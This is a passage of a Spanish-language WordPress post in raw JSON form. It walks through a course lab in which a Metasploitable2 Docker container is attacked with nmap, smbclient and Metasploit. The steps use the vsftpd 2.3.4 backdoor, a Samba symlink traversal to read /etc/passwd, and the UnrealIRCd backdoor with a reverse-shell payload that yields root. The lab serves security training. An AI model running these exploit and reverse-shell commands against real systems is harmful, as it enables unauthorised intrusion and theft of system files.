src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-181-1024x425.png\" alt=\"\" class=\"wp-image-23560\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-181-1024x425.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-181-300x124.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-181-768x319.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-181.png 1135w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Atacando el servicio FTP<\/h3>\n\n\n\n<p>En el paso 1 pudiste comprobar con nmap que hay un servicio ftp ejecut\u00e1ndose en el&nbsp;<strong>puerto 21<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Intenta explotarlo con Metasploit con los conocimientos que se te han dado previamente.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>En una terminal<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>docker run -it \\\n-p 2222:22 \\\n-p 80:80 \\\n-p 3306:3306 \\\n-p 445:445 \\\n-p 8080:8080 \\\ntleemcjr\/metasploitable2<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>En la otra<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -p- -sV -sC 172.17.0.2<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"771\" height=\"272\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-182.png\" alt=\"\" class=\"wp-image-23562\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-182.png 771w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-182-300x106.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-182-768x271.png 768w\" sizes=\"(max-width: 771px) 100vw, 771px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-183-1024x340.png\" alt=\"\" class=\"wp-image-23563\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-183-1024x340.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-183-300x100.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-183-768x255.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-183.png 1132w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Pregunta 2<\/strong><\/p>\n\n\n\n<p><strong>\u00bfExiste alguna vulnerabilidad asociada al servicio y versi\u00f3n? Si la respuesta es que s\u00ed, \u00bfc\u00f3mo se llama el m\u00f3dulo que hay que usar en Metasploit?<\/strong><\/p>\n\n\n\n<p><em>Formato de respuesta1 (No): No<\/em><\/p>\n\n\n\n<p><em>Formato de respuesta2 (S\u00ed): rutacompletadelmodulo<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Buscamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>search vsFTPd 2.3.4<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"959\" height=\"295\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-184.png\" alt=\"\" class=\"wp-image-23564\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-184.png 959w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-184-300x92.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-184-768x236.png 768w\" sizes=\"(max-width: 959px) 100vw, 959px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Respuesta<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>exploit\/unix\/ftp\/vsftpd_234_backdoor<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"377\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-185-1024x377.png\" alt=\"\" class=\"wp-image-23565\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-185-1024x377.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-185-300x110.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-185-768x283.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-185.png 1141w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">A por SMB<\/h3>\n\n\n\n<p>Otro de los puertos que vistes abierto fue el puerto 445, por lo que intuyes que est\u00e1 en ejecuci\u00f3n el protocolo SMB.&nbsp;<\/p>\n\n\n\n<p>Cuando se configura&nbsp;<strong>Samba<\/strong>&nbsp;con un recurso compartido escribible y \u00ab<em>wide links<\/em>\u00bb habilitados (por defecto est\u00e1 activado), tambi\u00e9n se puede utilizar como una especie de puerta trasera para acceder a archivos que no estaban destinados a ser compartidos.<\/p>\n\n\n\n<p>Tu misi\u00f3n ser\u00e1 verificar este tipo de vulnerabilidad y conseguir acceso al sistema de archivos ra\u00edz utilizando una conexi\u00f3n an\u00f3nima y un recurso compartido de escritura, en caso de que se pueda usando Metasploit.<\/p>\n\n\n\n<p><strong>Pregunta 1<\/strong><\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 comando, usando smbclient, tienes que introducir para verificar las conexiones an\u00f3nimas?<\/strong><\/p>\n\n\n\n<p><em>Ejemplo de respuesta: smbclient -opcion1 -opcion2 -opcion3 \/\/IP\/rutaquesea<\/em><\/p>\n\n\n\n<p><em><strong>NOTA<\/strong>: Como las IPs pueden diferir, dejar indicado<strong>&nbsp;\/\/IP&nbsp;<\/strong>en la respuesta sin especificar la misma.<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Respuesta<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient -L \/\/IP\nsmbclient -L 172.17.0.2<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"889\" height=\"527\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-187.png\" alt=\"\" class=\"wp-image-23567\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-187.png 889w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-187-300x178.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-187-768x455.png 768w\" sizes=\"(max-width: 889px) 100vw, 889px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"292\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-188-1024x292.png\" alt=\"\" class=\"wp-image-23569\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-188-1024x292.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-188-300x86.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-188-768x219.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-188.png 1145w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"760\" height=\"278\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-189.png\" alt=\"\" class=\"wp-image-23570\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-189.png 760w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-189-300x110.png 300w\" sizes=\"(max-width: 760px) 100vw, 760px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"335\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-190-1024x335.png\" alt=\"\" class=\"wp-image-23571\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-190-1024x335.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-190-300x98.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-190-768x251.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-190.png 1157w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>con base a la encontrado en el pregunta anterior debemos usar el moudlo symlik_traversal<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>use auxiliary\/admin\/smb\/samba_symlink_traversal\nset RHOSTS 172.17.0.2\nset SMBSHARE tmp\nrun<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"949\" height=\"526\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-191.png\" alt=\"\" class=\"wp-image-23572\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-191.png 949w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-191-300x166.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-191-768x426.png 768w\" sizes=\"(max-width: 949px) 100vw, 949px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Luego nos conectamos a share y navegamos al root:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>smbclient \/\/172.17.0.2\/tmp -N\ncd rootfs\nls<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1013\" height=\"881\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-192.png\" alt=\"\" class=\"wp-image-23573\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-192.png 1013w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-192-300x261.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-192-768x668.png 768w\" sizes=\"(max-width: 1013px) 100vw, 1013px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"342\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-193-1024x342.png\" alt=\"\" class=\"wp-image-23574\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-193-1024x342.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-193-300x100.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-193-768x257.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-193.png 1134w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"366\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-194-1024x366.png\" alt=\"\" class=\"wp-image-23581\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-194-1024x366.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-194-300x107.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-194-768x274.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-194.png 1157w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Pregunta 6<\/strong><\/p>\n\n\n\n<p>Una vez en el directorio ra\u00edz, prueba a listar las cuentas de usuarios del sistema.<\/p>\n\n\n\n<p><strong>\u00bfC\u00f3mo se llama el usuario con UID=2?<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>para esto descargamos el archivo<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>cd rootfs\ncd etc\n# get lo descarga\nget passwd<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Salimos y si listamos vemos el archivo<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>ls<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"918\" height=\"239\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-195.png\" alt=\"\" class=\"wp-image-23582\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-195.png 918w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-195-300x78.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-195-768x200.png 768w\" sizes=\"(max-width: 918px) 100vw, 918px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Abrimos el archivo<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nano passwd<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>el orden de los campos es <\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>usuario:contrase\u00f1a:UID:GID:descripci\u00f3n:directorio_home:shell<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>El contenido del archivo <\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh\nbin:x:2:2:bin:\/bin:\/bin\/sh\nsys:x:3:3:sys:\/dev:\/bin\/sh\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/bin\/sh\nman:x:6:12:man:\/var\/cache\/man:\/bin\/sh\nlp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh\nmail:x:8:8:mail:\/var\/mail:\/bin\/sh\nnews:x:9:9:news:\/var\/spool\/news:\/bin\/sh\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh\nproxy:x:13:13:proxy:\/bin:\/bin\/sh\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/sh\nbackup:x:34:34:backup:\/var\/backups:\/bin\/sh\nlist:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh\nirc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh\nnobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh\nlibuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh\ndhcp:x:101:102::\/nonexistent:\/bin\/false\n<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>por tanto seria el usuario<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>bin:x:2:2:bin:\/bin:\/bin\/sh<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"315\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-196-1024x315.png\" alt=\"\" class=\"wp-image-23583\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-196-1024x315.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-196-300x92.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-196-768x236.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-196.png 1131w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">IRC daemon<\/h3>\n\n\n\n<p>En el&nbsp;<strong>puerto 6667<\/strong>&nbsp;hay un servicio IRC en ejecuci\u00f3n. \u00bfPor qu\u00e9 no pruebas a investigar si es vulnerable y lo intentas explotar?<\/p>\n\n\n\n<p><strong>Pregunta 1<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Entonces para saber la versi\u00f3n <\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -sV -p 6667 172.17.0.2<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"931\" height=\"399\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-197.png\" alt=\"\" class=\"wp-image-23585\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-197.png 931w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-197-300x129.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-197-768x329.png 768w\" sizes=\"(max-width: 931px) 100vw, 931px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>No se logra obtener entonces<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>nc -vn 172.17.0.2 6667<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tampoco se logra<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"927\" height=\"555\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-198.png\" alt=\"\" class=\"wp-image-23586\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-198.png 927w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-198-300x180.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-198-768x460.png 768w\" sizes=\"(max-width: 927px) 100vw, 927px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Prueba buscando el m\u00f3dulo en Metasploit, que s\u00ed detecta la versi\u00f3n:<\/li>\n\n\n\n<li>buscamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>search ircd<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"932\" height=\"475\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-199.png\" alt=\"\" class=\"wp-image-23587\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-199.png 932w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-199-300x153.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-199-768x391.png 768w\" sizes=\"(max-width: 932px) 100vw, 932px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lo usamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/unix\/irc\/unreal_ircd_3281_backdoor\nset RHOSTS 172.17.0.2\ninfo<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"843\" height=\"141\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-200.png\" alt=\"\" class=\"wp-image-23588\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-200.png 843w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-200-300x50.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-200-768x128.png 768w\" sizes=\"(max-width: 843px) 100vw, 843px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"807\" height=\"676\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-201.png\" alt=\"\" class=\"wp-image-23589\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-201.png 807w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-201-300x251.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-201-768x643.png 768w\" sizes=\"(max-width: 807px) 100vw, 807px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"932\" height=\"610\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-202.png\" alt=\"\" class=\"wp-image-23590\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-202.png 932w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-202-300x196.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-202-768x503.png 768w\" sizes=\"(max-width: 932px) 100vw, 932px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"305\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-203-1024x305.png\" alt=\"\" class=\"wp-image-23591\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-203-1024x305.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-203-300x89.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-203-768x229.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-203.png 1140w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Pregunta 2<\/strong><\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 tipo de vulnerabilidad presenta?<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"870\" height=\"310\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-204.png\" alt=\"\" class=\"wp-image-23592\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-204.png 870w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-204-300x107.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-204-768x274.png 768w\" sizes=\"(max-width: 870px) 100vw, 870px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"256\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-205-1024x256.png\" alt=\"\" class=\"wp-image-23593\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-205-1024x256.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-205-300x75.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-205-768x192.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-205.png 1154w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Pregunta 3<\/strong><\/p>\n\n\n\n<p><strong>\u00bfCu\u00e1l es el m\u00f3dulo que has usado para conseguir acceso al sistema?<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>exploit\/unix\/irc\/unreal_ircd_3281_backdoor<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"260\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-206-1024x260.png\" alt=\"\" class=\"wp-image-23594\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-206-1024x260.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-206-300x76.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-206-768x195.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-206.png 1136w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Pregunta 4<\/strong><\/p>\n\n\n\n<p><strong>\u00bfQu\u00e9 UID tienes al conseguir explotar la vulnerabilidad?<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>para esto la debemos explotar<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/unix\/irc\/unreal_ircd_3281_backdoor\nset RHOSTS 172.17.0.2\nset PAYLOAD cmd\/unix\/reverse\nset LHOST 172.17.0.1\nrun<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"942\" height=\"596\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-207.png\" alt=\"\" class=\"wp-image-23595\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-207.png 942w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-207-300x190.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-207-768x486.png 768w\" sizes=\"(max-width: 942px) 100vw, 942px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Una vez que obtengas la sesi\u00f3n, ejecuta:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>id<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>uid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"534\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-208.png\" alt=\"\" class=\"wp-image-23596\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-208.png 933w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-208-300x172.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-208-768x440.png 768w\" sizes=\"(max-width: 933px) 100vw, 933px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"269\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-209-1024x269.png\" alt=\"\" class=\"wp-image-23597\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-209-1024x269.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-209-300x79.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-209-768x201.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-209.png 1140w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para experimentar un poco con Metasploit, lo que haremos ser\u00e1 desplegar una imagen docker vulnerable en nuestra Kali Linux. Lo primero que habr\u00e1 que hacer es instalar docker. Para ello hay que seguir los siguientes pasos: 1. Actualiza la lista de paquetes: 2. Instala los paquetes requeridos: 3. A\u00f1ade la clave PGP de docker: 4. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23497","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23497"}],"version-history":[{"count":8,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497\/revisions"}],"predecessor-version":[{"id":23599,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497\/revisions\/23599"}],"wp:attachment":[{"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}